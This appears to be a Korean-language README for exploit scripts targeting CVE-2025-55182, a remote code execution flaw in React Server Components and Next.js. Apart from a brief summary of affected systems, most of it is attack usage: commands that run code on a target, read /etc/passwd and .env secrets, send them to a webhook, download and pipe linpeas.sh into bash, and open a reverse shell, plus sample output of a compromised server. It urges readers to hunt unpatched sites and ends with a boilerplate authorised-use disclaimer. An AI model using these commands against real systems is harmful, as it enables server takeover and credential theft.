
CVE-2025-55182
✅ 즉, 공격자가 단 한 번의 조작된 요청으로 임의의 서버 측 코드를 실행할 수 있음을 의미합니다.
⚠️ React Server Components를 사용하는 시스템, 예를 들어:
✅ React 서버 DOM 패키지
✅ RSC를 번들링하는 프레임워크, 예:
❌ 영향받지 않는 경우:
🔍 전이적(transitive) 취약 패키지 스캔
🧾 사용 도구:
npm auditpnpm audityarn audit⚠️ 이는 위험을 줄일 뿐 — 패치를 대체하지 않습니다
✅ Next.js App Router를 사용하는 풀스택 개발자
✅ React SSR 앱을 호스팅하는 DevOps 팀
✅ 다음을 모니터링하는 보안 엔지니어:
🚨 앱이 React Server Components를 사용하면서 패치되지 않았다면 — 현재 완전히 장악되었을 가능성이 있습니다.
CVE-2025-55182.py(기본 RCE)
# Basic info
./CVE-2025-55182.py https://target.com "id"
./CVE-2025-55182.py https://target.com "whoami"
./CVE-2025-55182.py https://target.com "uname -a"
# Read files
./CVE-2025-55182.py https://target.com "cat /etc/passwd"
./CVE-2025-55182.py https://target.com "cat /app/.env"
# Exfiltrate
./CVE-2025-55182.py https://target.com "curl -X POST https://webhook.site/your-id -d @/app/.env"
# Download & run (if wget/curl exists)
./CVE-2025-55182.py https://target.com "curl -s http://your-ip:8000/linpeas.sh | bash"
CVE-2025-55182-revshell.py(즉시 리버스 셸)
# 1. Start listener (once)
nc -lvnp 4444
# 2. Fire → shell in <3 seconds
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
말 그대로 이것뿐입니다.
두 개의 스크립트, 이 8개의 명령으로 오늘날 패치되지 않은 모든 Next.js 사이트를 완전히 장악할 수 있습니다.
버그 바운티를 챙기세요.
다음은 익스플로잇이 작동할 때 실시간으로 보게 될 화면입니다(100% 패치되지 않은 대상, 2025년 12월 3일):
1. 일반 RCE 스크립트(CVE-2025-55182.py)를 실행할 때
다음을 입력합니다:
./CVE-2025-55182.py https://target.com "whoami"
화면에 즉시 표시됩니다:
[+] CVE-2025-55182 Exploit
[+] Target : https://target.com
[+] Command : whoami
[+] Sending payload ...
[+] Payload delivered successfully!
[+] HTTP 200 – Command should have executed on the server
[+] Server response:
node
→ 이 "node"(또는 명령이 반환하는 모든 값)는 피해자 서버의 실제 출력입니다.
id를 실행하면 전체 uid/gid 줄 등이 표시됩니다.
2. 리버스 셸 스크립트(CVE-2025-55182-revshell.py)를 실행할 때
다음을 입력합니다:
./CVE-2025-55182-revshell.py https://target.com 10.10.14.66:4444
리스너 터미널에 즉시 표시됩니다:
listening on [any] 4444 ...
connect to [10.10.14.66] from (UNKNOWN) [172.17.8.45] 54321
whoami
node
pwd
/app
ls -la
total 1234
drwxr-xr-x 1 node node 4096 Dec 3 12:34 .
drwxr-xr-x 1 root root 4096 Nov 30 10:11 ..
-rw-r--r-- 1 node node 420 Dec 3 11:11 .env
...
→ node 사용자(거의 항상 웹 앱 사용자)로 완전한 대화형 TTY 셸을 얻습니다. 서버를 완전히 장악한 것입니다.
말 그대로 이것뿐입니다.
위와 같은 화면이 보이면 → 익스플로잇이 100% 작동한 것입니다.
HTTP 403/404만 받거나 아무 응답이 없다면 → 이미 패치되었거나 WAF에 차단된 것입니다.
사냥을 시작하세요.
면책 조항
본 PoC는 승인된 보안 테스트 및 교육 목적으로만 제공됩니다.
소유하지 않았거나 명시적인 서면 테스트 허가를 받지 않은 시스템을 대상으로 실행하지 마십시오.
무단 사용은 불법이며 형사 처벌을 받을 수 있습니다.
자신의 랩, 범위가 명확한 버그 바운티 프로그램, 또는 허가를 받은 대상에서만 사용하십시오.
모든 행동에 대한 책임은 100% 본인에게 있습니다.